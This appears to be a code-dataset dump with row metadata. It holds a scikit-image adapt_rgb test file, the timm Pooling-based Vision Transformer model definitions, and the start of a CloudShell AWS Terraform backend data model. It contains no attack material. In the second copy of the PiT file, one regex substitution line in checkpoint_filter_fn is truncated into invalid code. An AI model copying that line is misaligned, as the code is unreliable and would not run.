assert_allclose(edges_each(GRAY_IMAGE), filters.sobel(GRAY_IMAGE))
def test_each_channel():
filtered = edges_each(COLOR_IMAGE)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
expected = img_as_float(filters.sobel(COLOR_IMAGE[:, :, i]))
assert_allclose(channel, expected)
def test_each_channel_with_filter_argument():
filtered = smooth_each(COLOR_IMAGE, SIGMA)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
assert_allclose(channel, smooth(COLOR_IMAGE[:, :, i]))
def test_each_channel_with_asymmetric_kernel():
mask = np.triu(np.ones(COLOR_IMAGE.shape[:2], dtype=np.bool_))
mask_each(COLOR_IMAGE, mask)
def test_hsv_value():
filtered = edges_hsv(COLOR_IMAGE)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], filters.sobel(value))
def test_hsv_value_with_filter_argument():
filtered = smooth_hsv(COLOR_IMAGE, SIGMA)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], smooth(value))
def test_hsv_value_with_non_float_output():
# Since `rgb2hsv` returns a float image and the result of the filtered
# result is inserted into the HSV image, we want to make sure there isn't
# a dtype mismatch.
filtered = edges_hsv_uint(COLOR_IMAGE)
filtered_value = color.rgb2hsv(filtered)[:, :, 2]
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
# Reduce tolerance because dtype conversion.
assert_allclose(filtered_value, filters.sobel(value), rtol=1e-5, atol=1e-5)
| 28.978947 | 79 | 0.730839 | from functools import partial
import numpy as np
from skimage import img_as_float, img_as_uint
from skimage import color, data, filters
from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
COLOR_IMAGE = data.astronaut()[::5, ::6]
GRAY_IMAGE = data.camera()[::5, ::5]
SIGMA = 3
smooth = partial(filters.gaussian, sigma=SIGMA)
assert_allclose = partial(np.testing.assert_allclose, atol=1e-8)
@adapt_rgb(each_channel)
def edges_each(image):
return filters.sobel(image)
@adapt_rgb(each_channel)
def smooth_each(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(each_channel)
def mask_each(image, mask):
result = image.copy()
result[mask] = 0
return result
@adapt_rgb(hsv_value)
def edges_hsv(image):
return filters.sobel(image)
@adapt_rgb(hsv_value)
def smooth_hsv(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(hsv_value)
def edges_hsv_uint(image):
return img_as_uint(filters.sobel(image))
def test_gray_scale_image():
# `adapt_rgb` is handling gray-scale inputs.
assert_allclose(edges_each(GRAY_IMAGE), filters.sobel(GRAY_IMAGE))
def test_each_channel():
filtered = edges_each(COLOR_IMAGE)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
expected = img_as_float(filters.sobel(COLOR_IMAGE[:, :, i]))
assert_allclose(channel, expected)
def test_each_channel_with_filter_argument():
filtered = smooth_each(COLOR_IMAGE, SIGMA)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
assert_allclose(channel, smooth(COLOR_IMAGE[:, :, i]))
def test_each_channel_with_asymmetric_kernel():
mask = np.triu(np.ones(COLOR_IMAGE.shape[:2], dtype=np.bool_))
mask_each(COLOR_IMAGE, mask)
def test_hsv_value():
filtered = edges_hsv(COLOR_IMAGE)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], filters.sobel(value))
def test_hsv_value_with_filter_argument():
filtered = smooth_hsv(COLOR_IMAGE, SIGMA)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], smooth(value))
def test_hsv_value_with_non_float_output():
# Since `rgb2hsv` returns a float image and the result of the filtered
# result is inserted into the HSV image, we want to make sure there isn't
filtered = edges_hsv_uint(COLOR_IMAGE)
filtered_value = color.rgb2hsv(filtered)[:, :, 2]
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(filtered_value, filters.sobel(value), rtol=1e-5, atol=1e-5)
| true | true |
f71030712e51257e43c9ff71be37bc814684e32c | 12,983 | py | Python | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | """ Pooling-based Vision Transformer (PiT) in PyTorch
A PyTorch implement of Pooling-based Vision Transformers as described in
'Rethinking Spatial Dimensions of Vision Transformers' - https://arxiv.org/abs/2103.16302
This code was adapted from the original version at https://github.com/naver-ai/pit, original copyright below.
Modifications for timm by / Copyright 2020 Ross Wightman
"""
# PiT
# Copyright 2021-present NAVER Corp.
# Apache License v2.0
import math
import re
from functools import partial
from typing import Tuple
import torch
from torch import nn
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from .helpers import build_model_with_cfg
from .layers import trunc_normal_, to_2tuple
from .registry import register_model
from .vision_transformer import Block
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
'first_conv': 'patch_embed.conv', 'classifier': 'head',
**kwargs
}
default_cfgs = {
# deit models (FB weights)
'pit_ti_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_730.pth'),
'pit_xs_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_781.pth'),
'pit_s_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_809.pth'),
'pit_b_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_820.pth'),
'pit_ti_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_distill_746.pth',
classifier=('head', 'head_dist')),
'pit_xs_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_distill_791.pth',
classifier=('head', 'head_dist')),
'pit_s_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_distill_819.pth',
classifier=('head', 'head_dist')),
'pit_b_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_distill_840.pth',
classifier=('head', 'head_dist')),
}
class SequentialTuple(nn.Sequential):
""" This module exists to work around torchscript typing issues list -> list"""
def __init__(self, *args):
super(SequentialTuple, self).__init__(*args)
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
for module in self:
x = module(x)
return x
class Transformer(nn.Module):
def __init__(
self, base_dim, depth, heads, mlp_ratio, pool=None, drop_rate=.0, attn_drop_rate=.0, drop_path_prob=None):
super(Transformer, self).__init__()
self.layers = nn.ModuleList([])
embed_dim = base_dim * heads
self.blocks = nn.Sequential(*[
Block(
dim=embed_dim,
num_heads=heads,
mlp_ratio=mlp_ratio,
qkv_bias=True,
drop=drop_rate,
attn_drop=attn_drop_rate,
drop_path=drop_path_prob[i],
norm_layer=partial(nn.LayerNorm, eps=1e-6)
)
for i in range(depth)])
self.pool = pool
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
x, cls_tokens = x
B, C, H, W = x.shape
token_length = cls_tokens.shape[1]
x = x.flatten(2).transpose(1, 2)
x = torch.cat((cls_tokens, x), dim=1)
x = self.blocks(x)
cls_tokens = x[:, :token_length]
x = x[:, token_length:]
x = x.transpose(1, 2).reshape(B, C, H, W)
if self.pool is not None:
x, cls_tokens = self.pool(x, cls_tokens)
return x, cls_tokens
class ConvHeadPooling(nn.Module):
def __init__(self, in_feature, out_feature, stride, padding_mode='zeros'):
super(ConvHeadPooling, self).__init__()
self.conv = nn.Conv2d(
in_feature, out_feature, kernel_size=stride + 1, padding=stride // 2, stride=stride,
padding_mode=padding_mode, groups=in_feature)
self.fc = nn.Linear(in_feature, out_feature)
def forward(self, x, cls_token) -> Tuple[torch.Tensor, torch.Tensor]:
x = self.conv(x)
cls_token = self.fc(cls_token)
return x, cls_token
class ConvEmbedding(nn.Module):
def __init__(self, in_channels, out_channels, patch_size, stride, padding):
super(ConvEmbedding, self).__init__()
self.conv = nn.Conv2d(
in_channels, out_channels, kernel_size=patch_size, stride=stride, padding=padding, bias=True)
def forward(self, x):
x = self.conv(x)
return x
class PoolingVisionTransformer(nn.Module):
""" Pooling-based Vision Transformer
A PyTorch implement of 'Rethinking Spatial Dimensions of Vision Transformers'
- https://arxiv.org/abs/2103.16302
"""
def __init__(self, img_size, patch_size, stride, base_dims, depth, heads,
mlp_ratio, num_classes=1000, in_chans=3, distilled=False,
attn_drop_rate=.0, drop_rate=.0, drop_path_rate=.0):
super(PoolingVisionTransformer, self).__init__()
padding = 0
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
height = math.floor((img_size[0] + 2 * padding - patch_size[0]) / stride + 1)
width = math.floor((img_size[1] + 2 * padding - patch_size[1]) / stride + 1)
self.base_dims = base_dims
self.heads = heads
self.num_classes = num_classes
self.num_tokens = 2 if distilled else 1
self.patch_size = patch_size
self.pos_embed = nn.Parameter(torch.randn(1, base_dims[0] * heads[0], height, width))
self.patch_embed = ConvEmbedding(in_chans, base_dims[0] * heads[0], patch_size, stride, padding)
self.cls_token = nn.Parameter(torch.randn(1, self.num_tokens, base_dims[0] * heads[0]))
self.pos_drop = nn.Dropout(p=drop_rate)
transformers = []
# stochastic depth decay rule
dpr = [x.tolist() for x in torch.linspace(0, drop_path_rate, sum(depth)).split(depth)]
for stage in range(len(depth)):
pool = None
if stage < len(heads) - 1:
pool = ConvHeadPooling(
base_dims[stage] * heads[stage], base_dims[stage + 1] * heads[stage + 1], stride=2)
transformers += [Transformer(
base_dims[stage], depth[stage], heads[stage], mlp_ratio, pool=pool,
drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_prob=dpr[stage])
]
self.transformers = SequentialTuple(*transformers)
self.norm = nn.LayerNorm(base_dims[-1] * heads[-1], eps=1e-6)
self.num_features = self.embed_dim = base_dims[-1] * heads[-1]
# Classifier head
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
self.head_dist = None
if distilled:
self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token'}
def get_classifier(self):
if self.head_dist is not None:
return self.head, self.head_dist
else:
return self.head
def reset_classifier(self, num_classes, global_pool=''):
self.num_classes = num_classes
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
if self.head_dist is not None:
self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
def forward_features(self, x):
x = self.patch_embed(x)
x = self.pos_drop(x + self.pos_embed)
cls_tokens = self.cls_token.expand(x.shape[0], -1, -1)
x, cls_tokens = self.transformers((x, cls_tokens))
cls_tokens = self.norm(cls_tokens)
if self.head_dist is not None:
return cls_tokens[:, 0], cls_tokens[:, 1]
else:
return cls_tokens[:, 0]
def forward(self, x):
x = self.forward_features(x)
if self.head_dist is not None:
x, x_dist = self.head(x[0]), self.head_dist(x[1]) # x must be a tuple
if self.training and not torch.jit.is_scripting():
return x, x_dist
else:
return (x + x_dist) / 2
else:
return self.head(x)
def checkpoint_filter_fn(state_dict, model):
""" preprocess checkpoints """
out_dict = {}
p_blocks = re.compile(r'pools\.(\d)\.')
for k, v in state_dict.items():
# FIXME need to update resize for PiT impl
# if k == 'pos_embed' and v.shape != model.pos_embed.shape:
# # To resize pos embedding when using model at different size from pretrained weights
# v = resize_pos_embed(v, model.pos_embed)
k = p_blocks.sub(lambda exp: f'transformers.{int(exp.group(1))}.pool.', k)
out_dict[k] = v
return out_dict
def _create_pit(variant, pretrained=False, **kwargs):
if kwargs.get('features_only', None):
raise RuntimeError('features_only not implemented for Vision Transformer models.')
model = build_model_with_cfg(
PoolingVisionTransformer, variant, pretrained,
default_cfg=default_cfgs[variant],
pretrained_filter_fn=checkpoint_filter_fn,
**kwargs)
return model
@register_model
def pit_b_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=14,
stride=7,
base_dims=[64, 64, 64],
depth=[3, 6, 4],
heads=[4, 8, 16],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_b_224', pretrained, **model_kwargs)
@register_model
def pit_s_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[3, 6, 12],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_s_224', pretrained, **model_kwargs)
@register_model
def pit_xs_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_xs_224', pretrained, **model_kwargs)
@register_model
def pit_ti_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[32, 32, 32],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_ti_224', pretrained, **model_kwargs)
@register_model
def pit_b_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=14,
stride=7,
base_dims=[64, 64, 64],
depth=[3, 6, 4],
heads=[4, 8, 16],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_b_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_s_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[3, 6, 12],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_s_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_xs_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_xs_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_ti_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[32, 32, 32],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_ti_distilled_224', pretrained, **model_kwargs)
| 33.722078 | 122 | 0.626281 |
import math
import re
from functools import partial
from typing import Tuple
import torch
from torch import nn
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from .helpers import build_model_with_cfg
from .layers import trunc_normal_, to_2tuple
from .registry import register_model
from .vision_transformer import Block
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
'first_conv': 'patch_embed.conv', 'classifier': 'head',
**kwargs
}
default_cfgs = {
'pit_ti_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_730.pth'),
'pit_xs_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_781.pth'),
'pit_s_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_809.pth'),
'pit_b_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_820.pth'),
'pit_ti_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_distill_746.pth',
classifier=('head', 'head_dist')),
'pit_xs_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_distill_791.pth',
classifier=('head', 'head_dist')),
'pit_s_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_distill_819.pth',
classifier=('head', 'head_dist')),
'pit_b_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_distill_840.pth',
classifier=('head', 'head_dist')),
}
class SequentialTuple(nn.Sequential):
def __init__(self, *args):
super(SequentialTuple, self).__init__(*args)
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
for module in self:
x = module(x)
return x
class Transformer(nn.Module):
def __init__(
self, base_dim, depth, heads, mlp_ratio, pool=None, drop_rate=.0, attn_drop_rate=.0, drop_path_prob=None):
super(Transformer, self).__init__()
self.layers = nn.ModuleList([])
embed_dim = base_dim * heads
self.blocks = nn.Sequential(*[
Block(
dim=embed_dim,
num_heads=heads,
mlp_ratio=mlp_ratio,
qkv_bias=True,
drop=drop_rate,
attn_drop=attn_drop_rate,
drop_path=drop_path_prob[i],
norm_layer=partial(nn.LayerNorm, eps=1e-6)
)
for i in range(depth)])
self.pool = pool
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
x, cls_tokens = x
B, C, H, W = x.shape
token_length = cls_tokens.shape[1]
x = x.flatten(2).transpose(1, 2)
x = torch.cat((cls_tokens, x), dim=1)
x = self.blocks(x)
cls_tokens = x[:, :token_length]
x = x[:, token_length:]
x = x.transpose(1, 2).reshape(B, C, H, W)
if self.pool is not None:
x, cls_tokens = self.pool(x, cls_tokens)
return x, cls_tokens
class ConvHeadPooling(nn.Module):
def __init__(self, in_feature, out_feature, stride, padding_mode='zeros'):
super(ConvHeadPooling, self).__init__()
self.conv = nn.Conv2d(
in_feature, out_feature, kernel_size=stride + 1, padding=stride // 2, stride=stride,
padding_mode=padding_mode, groups=in_feature)
self.fc = nn.Linear(in_feature, out_feature)
def forward(self, x, cls_token) -> Tuple[torch.Tensor, torch.Tensor]:
x = self.conv(x)
cls_token = self.fc(cls_token)
return x, cls_token
class ConvEmbedding(nn.Module):
def __init__(self, in_channels, out_channels, patch_size, stride, padding):
super(ConvEmbedding, self).__init__()
self.conv = nn.Conv2d(
in_channels, out_channels, kernel_size=patch_size, stride=stride, padding=padding, bias=True)
def forward(self, x):
x = self.conv(x)
return x
class PoolingVisionTransformer(nn.Module):
def __init__(self, img_size, patch_size, stride, base_dims, depth, heads,
mlp_ratio, num_classes=1000, in_chans=3, distilled=False,
attn_drop_rate=.0, drop_rate=.0, drop_path_rate=.0):
super(PoolingVisionTransformer, self).__init__()
padding = 0
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
height = math.floor((img_size[0] + 2 * padding - patch_size[0]) / stride + 1)
width = math.floor((img_size[1] + 2 * padding - patch_size[1]) / stride + 1)
self.base_dims = base_dims
self.heads = heads
self.num_classes = num_classes
self.num_tokens = 2 if distilled else 1
self.patch_size = patch_size
self.pos_embed = nn.Parameter(torch.randn(1, base_dims[0] * heads[0], height, width))
self.patch_embed = ConvEmbedding(in_chans, base_dims[0] * heads[0], patch_size, stride, padding)
self.cls_token = nn.Parameter(torch.randn(1, self.num_tokens, base_dims[0] * heads[0]))
self.pos_drop = nn.Dropout(p=drop_rate)
transformers = []
dpr = [x.tolist() for x in torch.linspace(0, drop_path_rate, sum(depth)).split(depth)]
for stage in range(len(depth)):
pool = None
if stage < len(heads) - 1:
pool = ConvHeadPooling(
base_dims[stage] * heads[stage], base_dims[stage + 1] * heads[stage + 1], stride=2)
transformers += [Transformer(
base_dims[stage], depth[stage], heads[stage], mlp_ratio, pool=pool,
drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_prob=dpr[stage])
]
self.transformers = SequentialTuple(*transformers)
self.norm = nn.LayerNorm(base_dims[-1] * heads[-1], eps=1e-6)
self.num_features = self.embed_dim = base_dims[-1] * heads[-1]
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
self.head_dist = None
if distilled:
self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token'}
def get_classifier(self):
if self.head_dist is not None:
return self.head, self.head_dist
else:
return self.head
def reset_classifier(self, num_classes, global_pool=''):
self.num_classes = num_classes
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
if self.head_dist is not None:
self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
def forward_features(self, x):
x = self.patch_embed(x)
x = self.pos_drop(x + self.pos_embed)
cls_tokens = self.cls_token.expand(x.shape[0], -1, -1)
x, cls_tokens = self.transformers((x, cls_tokens))
cls_tokens = self.norm(cls_tokens)
if self.head_dist is not None:
return cls_tokens[:, 0], cls_tokens[:, 1]
else:
return cls_tokens[:, 0]
def forward(self, x):
x = self.forward_features(x)
if self.head_dist is not None:
x, x_dist = self.head(x[0]), self.head_dist(x[1])
if self.training and not torch.jit.is_scripting():
return x, x_dist
else:
return (x + x_dist) / 2
else:
return self.head(x)
def checkpoint_filter_fn(state_dict, model):
out_dict = {}
p_blocks = re.compile(r'pools\.(\d)\.')
for k, v in state_dict.items():
ol.', k)
out_dict[k] = v
return out_dict
def _create_pit(variant, pretrained=False, **kwargs):
if kwargs.get('features_only', None):
raise RuntimeError('features_only not implemented for Vision Transformer models.')
model = build_model_with_cfg(
PoolingVisionTransformer, variant, pretrained,
default_cfg=default_cfgs[variant],
pretrained_filter_fn=checkpoint_filter_fn,
**kwargs)
return model
@register_model
def pit_b_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=14,
stride=7,
base_dims=[64, 64, 64],
depth=[3, 6, 4],
heads=[4, 8, 16],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_b_224', pretrained, **model_kwargs)
@register_model
def pit_s_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[3, 6, 12],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_s_224', pretrained, **model_kwargs)
@register_model
def pit_xs_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_xs_224', pretrained, **model_kwargs)
@register_model
def pit_ti_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[32, 32, 32],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
**kwargs
)
return _create_pit('pit_ti_224', pretrained, **model_kwargs)
@register_model
def pit_b_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=14,
stride=7,
base_dims=[64, 64, 64],
depth=[3, 6, 4],
heads=[4, 8, 16],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_b_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_s_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[3, 6, 12],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_s_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_xs_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[48, 48, 48],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_xs_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_ti_distilled_224(pretrained, **kwargs):
model_kwargs = dict(
patch_size=16,
stride=8,
base_dims=[32, 32, 32],
depth=[2, 6, 4],
heads=[2, 4, 8],
mlp_ratio=4,
distilled=True,
**kwargs
)
return _create_pit('pit_ti_distilled_224', pretrained, **model_kwargs)
| true | true |
f710319effdc93f2a10ac83e341c4ebc2f1204fe | 37,086 | py | Python | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 4 | 2021-11-26T05:41:05.000Z | 2022-03-11T20:01:40.000Z | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 10 | 2021-07-14T05:19:54.000Z | 2021-11-02T05:37:48.000Z | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 1 | 2021-11-01T07:46:59.000Z | 2021-11-01T07:46:59.000Z | from cloudshell.shell.core.driver_context import ResourceCommandContext, AutoLoadDetails, AutoLoadAttribute, \
AutoLoadResource
from collections import defaultdict
class LegacyUtils(object):
def __init__(self):
self._datamodel_clss_dict = self.__generate_datamodel_classes_dict()
def migrate_autoload_details(self, autoload_details, context):
model_name = context.resource.model
root_name = context.resource.name
root = self.__create_resource_from_datamodel(model_name, root_name)
attributes = self.__create_attributes_dict(autoload_details.attributes)
self.__attach_attributes_to_resource(attributes, '', root)
self.__build_sub_resoruces_hierarchy(root, autoload_details.resources, attributes)
return root
def __create_resource_from_datamodel(self, model_name, res_name):
return self._datamodel_clss_dict[model_name](res_name)
def __create_attributes_dict(self, attributes_lst):
d = defaultdict(list)
for attribute in attributes_lst:
d[attribute.relative_address].append(attribute)
return d
def __build_sub_resoruces_hierarchy(self, root, sub_resources, attributes):
d = defaultdict(list)
for resource in sub_resources:
splitted = resource.relative_address.split('/')
parent = '' if len(splitted) == 1 else resource.relative_address.rsplit('/', 1)[0]
rank = len(splitted)
d[rank].append((parent, resource))
self.__set_models_hierarchy_recursively(d, 1, root, '', attributes)
def __set_models_hierarchy_recursively(self, dict, rank, manipulated_resource, resource_relative_addr, attributes):
if rank not in dict: # validate if key exists
pass
for (parent, resource) in dict[rank]:
if parent == resource_relative_addr:
sub_resource = self.__create_resource_from_datamodel(
resource.model.replace(' ', ''),
resource.name)
self.__attach_attributes_to_resource(attributes, resource.relative_address, sub_resource)
manipulated_resource.add_sub_resource(
self.__slice_parent_from_relative_path(parent, resource.relative_address), sub_resource)
self.__set_models_hierarchy_recursively(
dict,
rank + 1,
sub_resource,
resource.relative_address,
attributes)
def __attach_attributes_to_resource(self, attributes, curr_relative_addr, resource):
for attribute in attributes[curr_relative_addr]:
setattr(resource, attribute.attribute_name.lower().replace(' ', '_'), attribute.attribute_value)
del attributes[curr_relative_addr]
def __slice_parent_from_relative_path(self, parent, relative_addr):
if parent is '':
return relative_addr
return relative_addr[len(parent) + 1:] # + 1 because we want to remove the seperator also
def __generate_datamodel_classes_dict(self):
return dict(self.__collect_generated_classes())
def __collect_generated_classes(self):
import sys, inspect
return inspect.getmembers(sys.modules[__name__], inspect.isclass)
class AwsTfBackend(object):
def __init__(self, name):
"""
"""
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
"""
Creates an instance of NXOS by given context
:param context: cloudshell.shell.core.driver_context.ResourceCommandContext
:type context: cloudshell.shell.core.driver_context.ResourceCommandContext
:return:
:rtype AwsTfBackend
"""
result = AwsTfBackend(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
"""
:param relative_path:
:type relative_path: str
:return
"""
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
"""
Combines relative path
:param child_path: Path of a model within it parent model, i.e 1
:type child_path: str
:param parent_path: Full path of parent model, i.e 1/1. Might be empty for root model
:type parent_path: str
:return: Combined path
:rtype str
"""
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
"""
Merges two instances of AutoLoadDetails into the first one
:param autoload_details1:
:type autoload_details1: AutoLoadDetails
:param autoload_details2:
:type autoload_details2: AutoLoadDetails
:return:
